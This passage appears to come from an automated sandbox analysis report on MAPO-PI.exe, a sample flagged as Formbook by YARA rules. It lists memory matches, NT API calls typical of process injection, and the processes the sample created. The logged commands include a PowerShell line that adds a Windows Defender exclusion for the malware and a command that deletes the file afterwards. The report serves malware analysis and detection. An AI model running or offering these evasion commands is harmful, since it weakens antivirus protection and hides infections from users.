          Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 0_2_000753760_2_00075376
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 0_2_0094E6A00_2_0094E6A0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 0_2_0094E6900_2_0094E690
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 0_2_0094CC5C0_2_0094CC5C
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 0_2_000720500_2_00072050
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041E2693_2_0041E269
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041DA873_2_0041DA87
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041D4753_2_0041D475
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00409E2B3_2_00409E2B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00409E303_2_00409E30
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041DFFF3_2_0041DFFF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041CF963_2_0041CF96
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00EB53763_2_00EB5376
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B99BF3_2_018B99BF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189F9003_2_0189F900
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B41203_2_018B4120
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AB0903_2_018AB090
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C20A03_2_018C20A0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019620A83_2_019620A8
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019628EC3_2_019628EC
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019510023_2_01951002
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0196E8243_2_0196E824
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA8303_2_018BA830
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CEBB03_2_018CEBB0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195DBD23_2_0195DBD2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019503DA3_2_019503DA
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CABD83_2_018CABD8
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019423E33_2_019423E3
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA3093_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01962B283_2_01962B28
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BAB403_2_018BAB40
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019622AE3_2_019622AE
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954AEF3_2_01954AEF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0194FA2B3_2_0194FA2B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C25813_2_018C2581
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D823_2_01952D82
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019625DD3_2_019625DD
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AD5E03_2_018AD5E0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01962D073_2_01962D07
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01890D203_2_01890D20
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01961D553_2_01961D55
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019544963_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A841F3_2_018A841F
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195D4663_2_0195D466
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0196DFCE3_2_0196DFCE
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01961FF13_2_01961FF1
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01962EF73_2_01962EF7
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195D6163_2_0195D616
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B6E303_2_018B6E30
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00EB20503_2_00EB2050
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D2D46616_2_04D2D466
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C7841F16_2_04C7841F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D325DD16_2_04D325DD
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C7D5E016_2_04C7D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C9258116_2_04C92581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D31D5516_2_04D31D55
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D32D0716_2_04D32D07
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C60D2016_2_04C60D20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D32EF716_2_04D32EF7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D2D61616_2_04D2D616
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C86E3016_2_04C86E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D3DFCE16_2_04D3DFCE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D31FF116_2_04D31FF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D328EC16_2_04D328EC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C7B09016_2_04C7B090
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C920A016_2_04C920A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D320A816_2_04D320A8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D2100216_2_04D21002
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D3E82416_2_04D3E824
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C8A83016_2_04C8A830
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C899BF16_2_04C899BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C6F90016_2_04C6F900
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C8412016_2_04C84120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D322AE16_2_04D322AE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D1FA2B16_2_04D1FA2B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D2DBD216_2_04D2DBD2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D203DA16_2_04D203DA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C9EBB016_2_04C9EBB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C8AB4016_2_04C8AB40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D32B2816_2_04D32B28
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304E26916_2_0304E269
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304DA8716_2_0304DA87
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304CF9616_2_0304CF96
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03032FB016_2_03032FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304DFFF16_2_0304DFFF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03039E2B16_2_03039E2B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03039E3016_2_03039E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03032D9016_2_03032D90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304D47516_2_0304D475
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04C6B150 appears 66 times
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: String function: 0189B150 appears 133 times
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419D50 NtCreateFile,3_2_00419D50
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419E00 NtReadFile,3_2_00419E00
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419E80 NtClose,3_2_00419E80
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419F30 NtAllocateVirtualMemory,3_2_00419F30
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419D4A NtCreateFile,3_2_00419D4A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419DFB NtReadFile,3_2_00419DFB
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419DA2 NtCreateFile,3_2_00419DA2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419E7A NtClose,3_2_00419E7A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419F2D NtAllocateVirtualMemory,3_2_00419F2D
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D99A0 NtCreateSection,LdrInitializeThunk,3_2_018D99A0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_018D9910
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_018D98F0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9840 NtDelayExecution,LdrInitializeThunk,3_2_018D9840
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_018D9860
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_018D9A00
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9A20 NtResumeThread,LdrInitializeThunk,3_2_018D9A20
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9A50 NtCreateFile,LdrInitializeThunk,3_2_018D9A50
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D95D0 NtClose,LdrInitializeThunk,3_2_018D95D0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9540 NtReadFile,LdrInitializeThunk,3_2_018D9540
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9780 NtMapViewOfSection,LdrInitializeThunk,3_2_018D9780
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_018D97A0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9710 NtQueryInformationToken,LdrInitializeThunk,3_2_018D9710
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_018D96E0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_018D9660
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D99D0 NtCreateProcessEx,3_2_018D99D0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9950 NtQueueApcThread,3_2_018D9950
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D98A0 NtWriteVirtualMemory,3_2_018D98A0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9820 NtEnumerateKey,3_2_018D9820
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018DB040 NtSuspendThread,3_2_018DB040
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018DA3B0 NtGetContextThread,3_2_018DA3B0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9B00 NtSetValueKey,3_2_018D9B00
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9A80 NtOpenDirectoryObject,3_2_018D9A80
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9A10 NtQuerySection,3_2_018D9A10
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D95F0 NtQueryInformationFile,3_2_018D95F0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9520 NtWaitForSingleObject,3_2_018D9520
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018DAD30 NtSetContextThread,3_2_018DAD30
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9560 NtWriteFile,3_2_018D9560
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9FE0 NtCreateMutant,3_2_018D9FE0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018DA710 NtOpenProcessToken,3_2_018DA710
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9730 NtQueryVirtualMemory,3_2_018D9730
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9760 NtOpenProcess,3_2_018D9760
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018DA770 NtOpenThread,3_2_018DA770
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9770 NtSetInformationFile,3_2_018D9770
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D96D0 NtCreateKey,3_2_018D96D0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9610 NtEnumerateValueKey,3_2_018D9610
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9650 NtQueryValueKey,3_2_018D9650
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9670 NtQueryInformationProcess,3_2_018D9670
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA95D0 NtClose,LdrInitializeThunk,16_2_04CA95D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9540 NtReadFile,LdrInitializeThunk,16_2_04CA9540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA96D0 NtCreateKey,LdrInitializeThunk,16_2_04CA96D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA96E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_04CA96E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9650 NtQueryValueKey,LdrInitializeThunk,16_2_04CA9650
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9660 NtAllocateVirtualMemory,LdrInitializeThunk,16_2_04CA9660
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9FE0 NtCreateMutant,LdrInitializeThunk,16_2_04CA9FE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9780 NtMapViewOfSection,LdrInitializeThunk,16_2_04CA9780
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9710 NtQueryInformationToken,LdrInitializeThunk,16_2_04CA9710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9840 NtDelayExecution,LdrInitializeThunk,16_2_04CA9840
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9860 NtQuerySystemInformation,LdrInitializeThunk,16_2_04CA9860
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA99A0 NtCreateSection,LdrInitializeThunk,16_2_04CA99A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_04CA9910
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9A50 NtCreateFile,LdrInitializeThunk,16_2_04CA9A50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA95F0 NtQueryInformationFile,16_2_04CA95F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9560 NtWriteFile,16_2_04CA9560
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9520 NtWaitForSingleObject,16_2_04CA9520
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CAAD30 NtSetContextThread,16_2_04CAAD30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9670 NtQueryInformationProcess,16_2_04CA9670
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9610 NtEnumerateValueKey,16_2_04CA9610
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA97A0 NtUnmapViewOfSection,16_2_04CA97A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9760 NtOpenProcess,16_2_04CA9760
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CAA770 NtOpenThread,16_2_04CAA770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9770 NtSetInformationFile,16_2_04CA9770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CAA710 NtOpenProcessToken,16_2_04CAA710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9730 NtQueryVirtualMemory,16_2_04CA9730
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA98F0 NtReadVirtualMemory,16_2_04CA98F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA98A0 NtWriteVirtualMemory,16_2_04CA98A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CAB040 NtSuspendThread,16_2_04CAB040
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9820 NtEnumerateKey,16_2_04CA9820
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA99D0 NtCreateProcessEx,16_2_04CA99D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9950 NtQueueApcThread,16_2_04CA9950
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9A80 NtOpenDirectoryObject,16_2_04CA9A80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9A00 NtProtectVirtualMemory,16_2_04CA9A00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9A10 NtQuerySection,16_2_04CA9A10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9A20 NtResumeThread,16_2_04CA9A20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CAA3B0 NtGetContextThread,16_2_04CAA3B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9B00 NtSetValueKey,16_2_04CA9B00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049F30 NtAllocateVirtualMemory,16_2_03049F30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049E00 NtReadFile,16_2_03049E00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049E80 NtClose,16_2_03049E80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049D50 NtCreateFile,16_2_03049D50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049F2D NtAllocateVirtualMemory,16_2_03049F2D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049E7A NtClose,16_2_03049E7A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049D4A NtCreateFile,16_2_03049D4A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049DA2 NtCreateFile,16_2_03049DA2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049DFB NtReadFile,16_2_03049DFB
          Source: MAPO-PI.exeBinary or memory string: OriginalFilename vs MAPO-PI.exe
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTaskNode.dll4 vs MAPO-PI.exe
          Source: MAPO-PI.exe, 00000000.00000002.237713929.00000000006E0000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs MAPO-PI.exe
          Source: MAPO-PI.exe, 00000000.00000002.237496370.000000000008A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDebugVi.exe< vs MAPO-PI.exe
          Source: MAPO-PI.exeBinary or memory string: OriginalFilename vs MAPO-PI.exe
          Source: MAPO-PI.exe, 00000003.00000000.232786703.0000000000ECA000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDebugVi.exe< vs MAPO-PI.exe
          Source: MAPO-PI.exe, 00000003.00000002.293450051.0000000001859000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameCMMON32.exe` vs MAPO-PI.exe
          Source: MAPO-PI.exe, 00000003.00000002.293616666.000000000198F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MAPO-PI.exe
          Source: MAPO-PI.exeBinary or memory string: OriginalFilenameDebugVi.exe< vs MAPO-PI.exe
          Source: MAPO-PI.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: MAPO-PI.exeVirustotal: Detection: 30%
          Source: MAPO-PI.exeReversingLabs: Detection: 39%
          Source: MAPO-PI.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\MAPO-PI.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\MAPO-PI.exe 'C:\Users\user\Desktop\MAPO-PI.exe'
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess created: C:\Users\user\Desktop\MAPO-PI.exe C:\Users\user\Desktop\MAPO-PI.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MAPO-PI.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'Jump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess created: C:\Users\user\Desktop\MAPO-PI.exe C:\Users\user\Desktop\MAPO-PI.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MAPO-PI.exe'Jump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MAPO-PI.exe.logJump to behavior
